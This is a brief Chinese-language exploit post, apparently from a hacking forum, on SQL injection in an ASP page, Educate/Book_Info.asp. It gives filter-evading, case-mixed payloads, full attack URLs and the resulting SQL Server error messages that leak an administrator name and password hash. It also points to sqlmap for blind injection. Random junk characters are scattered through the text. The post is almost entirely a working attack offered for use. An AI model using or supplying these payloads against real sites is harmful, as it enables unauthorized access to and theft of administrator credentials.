漏洞出现在Educate/Book_Info.asp
0 x) I" k! H3 p4 n 7 B2 }! A6 O! j) J5 z6 j
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出3 v ?/ M7 R; z
* J7 @8 u$ g2 h* x+ f) ]& L7 w
exp:如下
! @9 X) [4 X9 w2 Y& u9 H4 A查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
& m/ {+ H. Z6 y1 ? y查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper): T" o6 f. h2 ~" p5 X# D" |
7 j/ z( J# ]. ?% h, S/ dhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
/ p! }& s! i' \ - C7 H5 g7 d& N( G6 ]
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'! z2 @+ z: }* [( p$ n$ V2 J
7 p- T1 \- W8 ^6 J, g/ ^
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。. t" f" m- K, n" }- W d
- W# P7 e! U- a) i5 S
/Educate/Book_Info.asp,行 8
( \* ~8 e! |( A1 [9 P5 C2 W6 l
. m( y$ `! O0 }8 [http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
, }: `4 [/ [, r0 C " H, }6 F2 t5 x& x
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
( L5 y r5 y3 T( c! R ' m7 Y. A% d5 Z) w
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
1 w6 H& L& p- f6 P 1 g* M2 z" r9 ?' _ z
/Educate/Book_Info.asp,行 8
# B& I4 p1 \! ^/ w |